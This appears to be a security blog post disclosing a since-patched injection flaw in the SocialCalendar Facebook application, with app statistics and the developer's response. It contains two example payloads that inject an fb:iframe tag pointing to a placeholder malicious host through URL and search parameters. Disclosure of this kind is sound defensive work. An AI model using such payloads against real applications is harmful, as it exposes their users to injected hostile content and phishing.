FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query=”/><fb:iframe src=”http://eviluri/”>&sc_op=showView&sc_v=movieSearch

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Share with your friends!
  • Facebook
  • Twitter
  • Google Plus
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Comments are closed.